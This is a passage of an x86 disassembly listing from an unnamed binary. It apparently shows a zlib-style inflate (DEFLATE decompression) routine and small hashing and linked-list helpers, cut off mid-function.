mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
jmp short loc_4DBA62
; ---------------------------------------------------------------------------
loc_4DB9FA: ; CODE XREF: sub_4DB9B1+3D�j
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_4DB9DA
; ---------------------------------------------------------------------------
loc_4DBA05: ; CODE XREF: sub_4DB9B1+2D�j
push 0Ch
call sub_4D835A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4DBA26
xor eax, eax
mov edi, [ebp+var_C]
stosd
stosd
stosd
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
jmp short loc_4DBA2A
; ---------------------------------------------------------------------------
loc_4DBA26: ; CODE XREF: sub_4DB9B1+63�j
and [ebp+var_14], 0
loc_4DBA2A: ; CODE XREF: sub_4DB9B1+73�j
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax+4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [eax], ecx
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_4]
mov edx, [ebp+var_8]
mov eax, [eax+edx*4]
mov [ecx+8], eax
mov eax, [ebp+var_10]
mov eax, [eax+8]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_4]
mov [eax+ecx*4], edx
loc_4DBA62: ; CODE XREF: sub_4DB9B1+47�j
pop edi
leave
retn 10h
sub_4DB9B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBA67 proc near ; CODE XREF: sub_4D46D0+6F�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
and dword ptr [eax+0Ch], 0
leave
retn
sub_4DBA67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBA7E proc near ; CODE XREF: sub_4D46D0+82�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
loc_4DBA85: ; CODE XREF: sub_4DBA7E+5D�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov eax, [eax+4]
cmp eax, [ecx]
jb short loc_4DBA96
xor al, al
jmp short locret_4DBAFA
; ---------------------------------------------------------------------------
loc_4DBA96: ; CODE XREF: sub_4DBA7E+12�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4DBAB6
mov eax, [ebp+var_4]
mov eax, [eax+4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov edx, [ebp+var_4]
mov eax, [ecx+eax*4]
mov [edx+0Ch], eax
jmp short loc_4DBAC5
; ---------------------------------------------------------------------------
loc_4DBAB6: ; CODE XREF: sub_4DBA7E+1F�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_4]
mov eax, [eax+8]
mov [ecx+0Ch], eax
loc_4DBAC5: ; CODE XREF: sub_4DBA7E+36�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4DBADD
mov eax, [ebp+var_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+var_4]
mov [ecx+4], eax
jmp short loc_4DBA85
; ---------------------------------------------------------------------------
loc_4DBADD: ; CODE XREF: sub_4DBA7E+4E�j
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_0]
mov eax, [eax+4]
mov [ecx], eax
mov eax, [ebp+var_4]
mov eax, [eax+0Ch]
mov ecx, [ebp+arg_4]
mov eax, [eax]
mov [ecx], eax
mov al, 1
locret_4DBAFA: ; CODE XREF: sub_4DBA7E+16�j
leave
retn 8
sub_4DBA7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBAFE proc near ; DATA XREF: sub_4DB871+7�o
; sub_4DB8E0+7�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
pop ebp
retn
sub_4DBAFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBB0D proc near ; DATA XREF: sub_4D58CF+C�o
; sub_4D5BD7+1ED�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4DBB47
jmp short loc_4DBB2B
; ---------------------------------------------------------------------------
loc_4DBB24: ; CODE XREF: sub_4DBB0D+38�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4DBB2B: ; CODE XREF: sub_4DBB0D+15�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
test eax, eax
jz short loc_4DBB47
mov eax, [ebp+var_8]
shl eax, 1
mov ecx, [ebp+var_4]
movzx ecx, byte ptr [ecx]
or eax, ecx
mov [ebp+var_8], eax
jmp short loc_4DBB24
; ---------------------------------------------------------------------------
loc_4DBB47: ; CODE XREF: sub_4DBB0D+13�j
; sub_4DBB0D+26�j
mov eax, [ebp+var_8]
xor edx, edx
div [ebp+arg_4]
mov eax, edx
leave
retn
sub_4DBB0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBB53 proc near ; CODE XREF: sub_4DBBBF+7D�p
; sub_4DC5B0+F�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
xor ebx, ebx
push esi
mov esi, [ebp+arg_0]
cmp eax, ebx
push edi
jz short loc_4DBB6A
mov ecx, [esi+3Ch]
mov [eax], ecx
loc_4DBB6A: ; CODE XREF: sub_4DBB53+10�j
mov eax, [esi]
mov edi, [ebp+arg_4]
cmp eax, 4
jz short loc_4DBB79
cmp eax, 5
jnz short loc_4DBB84
loc_4DBB79: ; CODE XREF: sub_4DBB53+1F�j
push dword ptr [esi+0Ch]
push dword ptr [edi+28h]
call dword ptr [edi+24h]
pop ecx
pop ecx
loc_4DBB84: ; CODE XREF: sub_4DBB53+24�j
cmp dword ptr [esi], 6
jnz short loc_4DBB94
push edi
push dword ptr [esi+4]
call sub_4DCBD8
pop ecx
pop ecx
loc_4DBB94: ; CODE XREF: sub_4DBB53+34�j
mov eax, [esi+28h]
mov [esi], ebx
mov [esi+34h], eax
mov [esi+30h], eax
mov eax, [esi+38h]
mov [esi+1Ch], ebx
cmp eax, ebx
mov [esi+20h], ebx
jz short loc_4DBBBA
push ebx
push ebx
push ebx
call eax
mov [esi+3Ch], eax
add esp, 0Ch
mov [edi+30h], eax
loc_4DBBBA: ; CODE XREF: sub_4DBB53+57�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4DBB53 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBBBF proc near ; CODE XREF: sub_4DCF41+AF�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 40h
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_4DBC26
push 5A0h
push 8
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+24h], eax
test eax, eax
jnz short loc_4DBBFD
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
pop ecx
jmp short loc_4DBC26
; ---------------------------------------------------------------------------
loc_4DBBFD: ; CODE XREF: sub_4DBBBF+31�j
mov ebx, [ebp+arg_8]
push ebx
push 1
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [edi+28h], eax
test eax, eax
jnz short loc_4DBC2A
push dword ptr [edi+24h]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
push edi
push dword ptr [esi+28h]
call dword ptr [esi+24h]
add esp, 10h
loc_4DBC26: ; CODE XREF: sub_4DBBBF+1A�j
; sub_4DBBBF+3C�j
xor eax, eax
jmp short loc_4DBC46
; ---------------------------------------------------------------------------
loc_4DBC2A: ; CODE XREF: sub_4DBBBF+52�j
and dword ptr [edi], 0
add eax, ebx
mov [edi+2Ch], eax
mov eax, [ebp+arg_4]
push 0
push esi
push edi
mov [edi+38h], eax
call sub_4DBB53
add esp, 0Ch
mov eax, edi
loc_4DBC46: ; CODE XREF: sub_4DBBBF+69�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4DBBBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DBC4B proc near ; CODE XREF: sub_4DD043+11B�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_0]
push esi
mov ecx, [eax]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
mov [ebp+var_10], ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
cmp ecx, eax
push edi
mov [ebp+var_C], ecx
jnb short loc_4DBC83
sub eax, ecx
dec eax
jmp short loc_4DBC88
; ---------------------------------------------------------------------------
loc_4DBC83: ; CODE XREF: sub_4DBC4B+31�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_4DBC88: ; CODE XREF: sub_4DBC4B+36�j
mov [ebp+var_14], eax
loc_4DBC8B: ; CODE XREF: sub_4DBC4B+AD�j
; sub_4DBC4B+10B�j ...
mov eax, [ebx]
cmp eax, 9 ; switch 10 cases
ja loc_4DC550 ; default
jmp ds:off_4DC588[eax*4] ; switch jump
loc_4DBC9D: ; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_4] ; jumptable 004DBC96 case 0
mov esi, [ebp+arg_0]
mov edx, [ebp+var_10]
cmp edi, 3
jnb short loc_4DBCD7
loc_4DBCAB: ; CODE XREF: sub_4DBC4B+8A�j
cmp [ebp+var_8], 0
jz loc_4DC28C
movzx eax, byte ptr [edx]
and [ebp+arg_8], 0
dec [ebp+var_8]
mov ecx, edi
add edi, 8
shl eax, cl
mov [ebp+var_4], edi
or esi, eax
inc edx
cmp edi, 3
mov [ebp+arg_0], esi
mov [ebp+var_10], edx
jb short loc_4DBCAB
loc_4DBCD7: ; CODE XREF: sub_4DBC4B+5E�j
mov eax, esi
and eax, 7
mov ecx, eax
shr eax, 1
and ecx, 1
sub eax, 0
mov [ebx+18h], ecx
jz short loc_4DBD5B
dec eax
jz short loc_4DBD0D
dec eax
jz short loc_4DBCFA
dec eax
jz loc_4DC2A7
jmp short loc_4DBC8B
; ---------------------------------------------------------------------------
loc_4DBCFA: ; CODE XREF: sub_4DBC4B+A4�j
push 3
pop eax
shr esi, 3
sub edi, eax
mov [ebp+arg_0], esi
mov [ebp+var_4], edi
jmp loc_4DBDE7
; ---------------------------------------------------------------------------
loc_4DBD0D: ; CODE XREF: sub_4DBC4B+A1�j
mov edi, [ebp+arg_4]
lea eax, [ebp+var_1C]
push edi
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_28]
push eax
call sub_4DD8AF
push edi
push [ebp+var_1C]
push [ebp+var_20]
push [ebp+var_24]
push [ebp+var_28]
call sub_4DC5E6
add esp, 28h
mov [ebx+4], eax
test eax, eax
jz loc_4DC2D7
shr esi, 3
sub [ebp+var_4], 3
mov [ebp+arg_0], esi
mov dword ptr [ebx], 6
jmp loc_4DBC8B
; ---------------------------------------------------------------------------
loc_4DBD5B: ; CODE XREF: sub_4DBC4B+9E�j
sub edi, 3
mov dword ptr [ebx], 1
mov ecx, edi
and ecx, 7
shr esi, 3
shr esi, cl
sub edi, ecx
mov [ebp+var_4], edi
mov [ebp+arg_0], esi
jmp loc_4DBC8B
; ---------------------------------------------------------------------------
loc_4DBD7B: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov ecx, [ebp+var_4] ; jumptable 004DBC96 case 1
mov esi, [ebp+arg_0]
cmp ecx, 20h
jnb short loc_4DBDAF
mov edx, [ebp+var_10]
xor edi, edi
loc_4DBD8B: ; CODE XREF: sub_4DBC4B+160�j
cmp [ebp+var_8], edi
jz loc_4DC300
movzx eax, byte ptr [edx]
dec [ebp+var_8]
mov [ebp+arg_8], edi
shl eax, cl
add ecx, 8
or esi, eax
inc edx
cmp ecx, 20h
mov [ebp+var_10], edx
jb short loc_4DBD8B
jmp short loc_4DBDB2
; ---------------------------------------------------------------------------
loc_4DBDAF: ; CODE XREF: sub_4DBC4B+139�j
mov edx, [ebp+var_10]
loc_4DBDB2: ; CODE XREF: sub_4DBC4B+162�j
mov edi, esi
mov eax, esi
not edi
and eax, 0FFFFh
shr edi, 10h
xor edi, eax
jnz loc_4DC30E
mov [ebx+4], eax
xor eax, eax
cmp [ebx+4], eax
mov [ebp+var_4], eax
mov [ebp+arg_0], eax
jz short loc_4DBDDD
push 2
pop eax
jmp short loc_4DBDE7
; ---------------------------------------------------------------------------
loc_4DBDDD: ; CODE XREF: sub_4DBC4B+18B�j
; sub_4DBC4B+288�j
mov eax, [ebx+18h]
neg eax
sbb eax, eax
and eax, 7
loc_4DBDE7: ; CODE XREF: sub_4DBC4B+BD�j
; sub_4DBC4B+190�j
mov [ebx], eax
jmp loc_4DBC8B
; ---------------------------------------------------------------------------
loc_4DBDEE: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
cmp [ebp+var_8], 0 ; jumptable 004DBC96 case 2
jz loc_4DC326
mov ecx, [ebp+var_14]
test ecx, ecx
jnz loc_4DBE93
mov ecx, [ebx+2Ch]
mov edx, [ebp+var_C]
cmp edx, ecx
jnz short loc_4DBE30
mov eax, [ebx+30h]
mov esi, [ebx+28h]
cmp eax, esi
jz short loc_4DBE30
mov edx, esi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_4DBE27
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_4DBE29
; ---------------------------------------------------------------------------
loc_4DBE27: ; CODE XREF: sub_4DBC4B+1D3�j
sub ecx, edx
loc_4DBE29: ; CODE XREF: sub_4DBC4B+1DA�j
test ecx, ecx
mov [ebp+var_14], ecx
jnz short loc_4DBE93
loc_4DBE30: ; CODE XREF: sub_4DBC4B+1C0�j
; sub_4DBC4B+1CA�j
push [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebx+34h], edx
push esi
push ebx
call sub_4DD8DE
mov edx, [ebx+34h]
mov [ebp+arg_8], eax
mov eax, [ebx+30h]
add esp, 0Ch
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_4DBE5A
mov ecx, eax
sub ecx, edx
dec ecx
jmp short loc_4DBE5F
; ---------------------------------------------------------------------------
loc_4DBE5A: ; CODE XREF: sub_4DBC4B+206�j
mov ecx, [ebx+2Ch]
sub ecx, edx
loc_4DBE5F: ; CODE XREF: sub_4DBC4B+20D�j
mov edi, [ebx+2Ch]
mov [ebp+var_14], ecx
cmp edx, edi
mov [ebp+var_18], edi
jnz short loc_4DBE8B
mov edi, [ebx+28h]
cmp eax, edi
jz short loc_4DBE8B
mov edx, edi
cmp edx, eax
mov [ebp+var_C], edx
jnb short loc_4DBE83
sub eax, edx
dec eax
mov ecx, eax
jmp short loc_4DBE88
; ---------------------------------------------------------------------------
loc_4DBE83: ; CODE XREF: sub_4DBC4B+22F�j
mov ecx, [ebp+var_18]
sub ecx, edx
loc_4DBE88: ; CODE XREF: sub_4DBC4B+236�j
mov [ebp+var_14], ecx
loc_4DBE8B: ; CODE XREF: sub_4DBC4B+21F�j
; sub_4DBC4B+226�j
test ecx, ecx
jz loc_4DC347
loc_4DBE93: ; CODE XREF: sub_4DBC4B+1B2�j
; sub_4DBC4B+1E3�j
mov eax, [ebx+4]
and [ebp+arg_8], 0
cmp eax, [ebp+var_8]
jbe short loc_4DBEA2
mov eax, [ebp+var_8]
loc_4DBEA2: ; CODE XREF: sub_4DBC4B+252�j
cmp eax, ecx
jbe short loc_4DBEA8
mov eax, ecx
loc_4DBEA8: ; CODE XREF: sub_4DBC4B+259�j
mov esi, [ebp+var_10]
mov edi, [ebp+var_C]
mov ecx, eax
add [ebp+var_10], eax
mov edx, ecx
sub [ebp+var_8], eax
shr ecx, 2
rep movsd
add [ebp+var_C], eax
sub [ebp+var_14], eax
mov ecx, edx
and ecx, 3
rep movsb
sub [ebx+4], eax
jnz loc_4DBC8B
jmp loc_4DBDDD
; ---------------------------------------------------------------------------
loc_4DBED8: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov ecx, [ebp+var_4] ; jumptable 004DBC96 case 3
mov edi, [ebp+var_10]
cmp ecx, 0Eh
jnb short loc_4DBF08
loc_4DBEE3: ; CODE XREF: sub_4DBC4B+2BB�j
cmp [ebp+var_8], 0
jz loc_4DC370
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
add ecx, 8
mov [ebp+var_4], ecx
or [ebp+arg_0], eax
inc edi
cmp ecx, 0Eh
jb short loc_4DBEE3
loc_4DBF08: ; CODE XREF: sub_4DBC4B+296�j
mov eax, [ebp+arg_0]
and eax, 3FFFh
mov ecx, eax
mov [ebx+4], eax
and ecx, 1Fh
cmp ecx, 1Dh
ja loc_4DC3C2
mov edx, eax
and edx, 3E0h
cmp edx, 3A0h
ja loc_4DC3C2
mov esi, [ebp+arg_4]
push 4
shr eax, 5
and eax, 1Fh
lea eax, [eax+ecx+102h]
push eax
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebx+0Ch], eax
test eax, eax
jz loc_4DC39A
shr [ebp+arg_0], 0Eh
sub [ebp+var_4], 0Eh
and dword ptr [ebx+8], 0
mov dword ptr [ebx], 4
jmp short loc_4DBF76
; ---------------------------------------------------------------------------
loc_4DBF70: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_10] ; jumptable 004DBC96 case 4
mov esi, [ebp+arg_4]
loc_4DBF76: ; CODE XREF: sub_4DBC4B+323�j
mov eax, [ebx+4]
shr eax, 0Ah
add eax, 4
cmp [ebx+8], eax
jnb short loc_4DBFDF
loc_4DBF84: ; CODE XREF: sub_4DBC4B+392�j
mov ecx, [ebp+var_4]
loc_4DBF87: ; CODE XREF: sub_4DBC4B+361�j
cmp ecx, 3
jnb short loc_4DBFAE
cmp [ebp+var_8], 0
jz loc_4DC432
movzx eax, byte ptr [edi]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl eax, cl
or [ebp+arg_0], eax
inc edi
add ecx, 8
mov [ebp+var_4], ecx
jmp short loc_4DBF87
; ---------------------------------------------------------------------------
loc_4DBFAE: ; CODE XREF: sub_4DBC4B+33F�j
mov ecx, [ebx+8]
mov eax, [ebp+arg_0]
mov edx, [ebx+0Ch]
and eax, 7
mov ecx, ds:dword_4DE060[ecx*4]
sub [ebp+var_4], 3
shr [ebp+arg_0], 3
mov [edx+ecx*4], eax
mov ecx, [ebx+4]
inc dword ptr [ebx+8]
mov eax, [ebx+8]
shr ecx, 0Ah
add ecx, 4
cmp eax, ecx
jb short loc_4DBF84
loc_4DBFDF: ; CODE XREF: sub_4DBC4B+337�j
; sub_4DBC4B+3AE�j
cmp dword ptr [ebx+8], 13h
jnb short loc_4DBFFB
mov eax, [ebx+8]
mov ecx, [ebx+0Ch]
mov eax, ds:dword_4DE060[eax*4]
and dword ptr [ecx+eax*4], 0
inc dword ptr [ebx+8]
jmp short loc_4DBFDF
; ---------------------------------------------------------------------------
loc_4DBFFB: ; CODE XREF: sub_4DBC4B+398�j
push esi
lea ecx, [ebx+14h]
push dword ptr [ebx+24h]
lea eax, [ebx+10h]
push ecx
push eax
push dword ptr [ebx+0Ch]
mov dword ptr [eax], 7
call sub_4DD3A6
add esp, 14h
mov [ebp+var_14], eax
test eax, eax
jnz loc_4DC3F2
and [ebx+8], eax
mov dword ptr [ebx], 5
jmp short loc_4DC034
; ---------------------------------------------------------------------------
loc_4DC02E: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_10] ; jumptable 004DBC96 case 5
mov esi, [ebp+arg_4]
loc_4DC034: ; CODE XREF: sub_4DBC4B+3E1�j
; sub_4DBC4B+46B�j ...
mov eax, [ebx+4]
mov ecx, [ebx+8]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
cmp ecx, eax
jnb loc_4DC178
mov eax, [ebx+10h]
loc_4DC057: ; CODE XREF: sub_4DBC4B+432�j
cmp [ebp+var_4], eax
jnb short loc_4DC07F
cmp [ebp+var_8], 0
jz loc_4DC432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_4DC057
; ---------------------------------------------------------------------------
loc_4DC07F: ; CODE XREF: sub_4DBC4B+40F�j
mov eax, ds:dword_4E0318[eax*4]
mov ecx, [ebx+14h]
and eax, [ebp+arg_0]
mov edx, [ecx+eax*8+4]
lea eax, [ecx+eax*8]
cmp edx, 10h
mov [ebp+var_18], edx
movzx ecx, byte ptr [eax+1]
mov [ebp+var_14], ecx
jnb short loc_4DC0BB
shr [ebp+arg_0], cl
mov eax, ecx
mov ecx, [ebx+0Ch]
sub [ebp+var_4], eax
mov eax, [ebx+8]
mov [ecx+eax*4], edx
inc dword ptr [ebx+8]
jmp loc_4DC034
; ---------------------------------------------------------------------------
loc_4DC0BB: ; CODE XREF: sub_4DBC4B+455�j
cmp edx, 12h
jnz short loc_4DC0C5
push 7
pop eax
jmp short loc_4DC0C8
; ---------------------------------------------------------------------------
loc_4DC0C5: ; CODE XREF: sub_4DBC4B+473�j
lea eax, [edx-0Eh]
loc_4DC0C8: ; CODE XREF: sub_4DBC4B+478�j
xor ecx, ecx
cmp edx, 12h
setnz cl
dec ecx
and ecx, 8
add ecx, 3
mov [ebp+var_10], ecx
loc_4DC0DA: ; CODE XREF: sub_4DBC4B+4BB�j
mov ecx, [ebp+var_14]
lea edx, [eax+ecx]
cmp [ebp+var_4], edx
jnb short loc_4DC108
cmp [ebp+var_8], 0
jz loc_4DC432
movzx edx, byte ptr [edi]
mov ecx, [ebp+var_4]
and [ebp+arg_8], 0
dec [ebp+var_8]
shl edx, cl
or [ebp+arg_0], edx
inc edi
add [ebp+var_4], 8
jmp short loc_4DC0DA
; ---------------------------------------------------------------------------
loc_4DC108: ; CODE XREF: sub_4DBC4B+498�j
shr [ebp+arg_0], cl
mov ecx, ds:dword_4E0318[eax*4]
and ecx, [ebp+arg_0]
add [ebp+var_10], ecx
mov ecx, eax
shr [ebp+arg_0], cl
mov ecx, [ebp+var_14]
add eax, ecx
mov ecx, [ebx+8]
sub [ebp+var_4], eax
mov eax, [ebx+4]
mov edx, eax
and eax, 1Fh
shr edx, 5
and edx, 1Fh
lea eax, [edx+eax+102h]
mov edx, [ebp+var_10]
add edx, ecx
cmp edx, eax
ja loc_4DC456
cmp [ebp+var_18], 10h
jnz short loc_4DC162
cmp ecx, 1
jb loc_4DC456
mov eax, [ebx+0Ch]
mov eax, [eax+ecx*4-4]
jmp short loc_4DC164
; ---------------------------------------------------------------------------
loc_4DC162: ; CODE XREF: sub_4DBC4B+503�j
xor eax, eax
loc_4DC164: ; CODE XREF: sub_4DBC4B+515�j
; sub_4DBC4B+523�j
mov edx, [ebx+0Ch]
mov [edx+ecx*4], eax
inc ecx
dec [ebp+var_10]
jnz short loc_4DC164
mov [ebx+8], ecx
jmp loc_4DC034
; ---------------------------------------------------------------------------
loc_4DC178: ; CODE XREF: sub_4DBC4B+403�j
push esi
lea ecx, [ebp+var_2C]
push dword ptr [ebx+24h]
mov eax, [ebx+4]
and dword ptr [ebx+14h], 0
mov [ebp+var_18], 9
push ecx
lea ecx, [ebp+var_30]
push ecx
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_18]
push ecx
mov ecx, eax
push dword ptr [ebx+0Ch]
and eax, 1Fh
shr ecx, 5
and ecx, 1Fh
add eax, 101h
inc ecx
mov [ebp+var_10], 6
push ecx
push eax
call sub_4DD7AC
add esp, 24h
mov [ebp+var_14], eax
test eax, eax
jnz loc_4DC49E
push esi
push [ebp+var_2C]
push [ebp+var_30]
push [ebp+var_10]
push [ebp+var_18]
call sub_4DC5E6
add esp, 14h
test eax, eax
jz loc_4DC39A
push dword ptr [ebx+0Ch]
mov [ebx+4], eax
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov dword ptr [ebx], 6
pop ecx
jmp short loc_4DC203
; ---------------------------------------------------------------------------
loc_4DC1FD: ; CODE XREF: sub_4DBC4B+4B�j
; DATA XREF: _4:off_4DC588�o
mov edi, [ebp+var_10] ; jumptable 004DBC96 case 6
mov esi, [ebp+arg_4]
loc_4DC203: ; CODE XREF: sub_4DBC4B+5B0�j
mov eax, [ebp+arg_0]
push [ebp+arg_8]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [esi+4], eax
mov eax, edi
sub eax, [esi]
push esi
mov [esi], edi
push ebx
add [esi+8], eax
mov eax, [ebp+var_C]
mov [ebx+34h], eax
call sub_4DC61A
add esp, 0Ch
cmp eax, 1
jnz loc_4DC4EE
and [ebp+arg_8], 0
push esi
push dword ptr [ebx+4]
call sub_4DCBD8
mov eax, [esi+4]
mov edi, [esi]
mov [ebp+var_8], eax
mov eax, [ebx+20h]
pop ecx
mov [ebp+arg_0], eax
mov eax, [ebx+1Ch]
pop ecx
mov ecx, [ebx+34h]
mov [ebp+var_4], eax
mov eax, [ebx+30h]
mov [ebp+var_10], edi
cmp ecx, eax
mov [ebp+var_C], ecx
jnb short loc_4DC272
sub eax, ecx
dec eax
jmp short loc_4DC277
; ---------------------------------------------------------------------------
loc_4DC272: ; CODE XREF: sub_4DBC4B+620�j
mov eax, [ebx+2Ch]
sub eax, ecx
loc_4DC277: ; CODE XREF: sub_4DBC4B+625�j
cmp dword ptr [ebx+18h], 0
mov [ebp+var_14], eax
jnz loc_4DC4A7
and dword ptr [ebx], 0
jmp loc_4DBC8B
; ---------------------------------------------------------------------------
loc_4DC28C: ; CODE XREF: sub_4DBC4B+64�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], edi
and dword ptr [eax+4], 0
loc_4DC299: ; CODE XREF: sub_4DBC4B+6C1�j
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_4DC38C
; ---------------------------------------------------------------------------
loc_4DC2A7: ; CODE XREF: sub_4DBC4B+A7�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
shr esi, 3
add edi, 0FFFFFFFDh
mov dword ptr [eax+18h], offset aInvalidBlockTy ; "invalid block type"
mov [ebx+20h], esi
mov [ebx+1Ch], edi
loc_4DC2C3: ; CODE XREF: sub_4DBC4B+6D9�j
mov ecx, [ebp+var_8]
mov [eax+4], ecx
mov ecx, edx
sub ecx, [eax]
mov [eax], edx
add [eax+8], ecx
jmp loc_4DC546
; ---------------------------------------------------------------------------
loc_4DC2D7: ; CODE XREF: sub_4DBC4B+F5�j
mov eax, [ebp+var_4]
mov [ebx+20h], esi
mov [ebx+1Ch], eax
mov eax, [ebp+var_8]
mov [edi+4], eax
mov eax, [ebp+var_10]
mov ecx, eax
push 0FFFFFFFCh
sub ecx, [edi]
mov [edi], eax
mov eax, [ebp+var_C]
push edi
add [edi+8], ecx
mov [ebx+34h], eax
jmp loc_4DC57A
; ---------------------------------------------------------------------------
loc_4DC300: ; CODE XREF: sub_4DBC4B+143�j
mov eax, [ebp+arg_4]
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
mov [eax+4], edi
jmp short loc_4DC299
; ---------------------------------------------------------------------------
loc_4DC30E: ; CODE XREF: sub_4DBC4B+177�j
mov eax, [ebp+arg_4]
mov dword ptr [ebx], 9
mov dword ptr [eax+18h], offset aInvalidStoredB ; "invalid stored block lengths"
mov [ebx+20h], esi
mov [ebx+1Ch], ecx
jmp short loc_4DC2C3
; ---------------------------------------------------------------------------
loc_4DC326: ; CODE XREF: sub_4DBC4B+1A7�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
mov eax, [ebp+arg_4]
mov edx, ecx
sub edx, [eax]
and dword ptr [eax+4], 0
mov [eax], ecx
add [eax+8], edx
jmp short loc_4DC38C
; ---------------------------------------------------------------------------
loc_4DC347: ; CODE XREF: sub_4DBC4B+242�j
mov eax, [ebp+arg_0]
mov [ebx+20h], eax
mov eax, [ebp+var_4]
mov [ebx+1Ch], eax
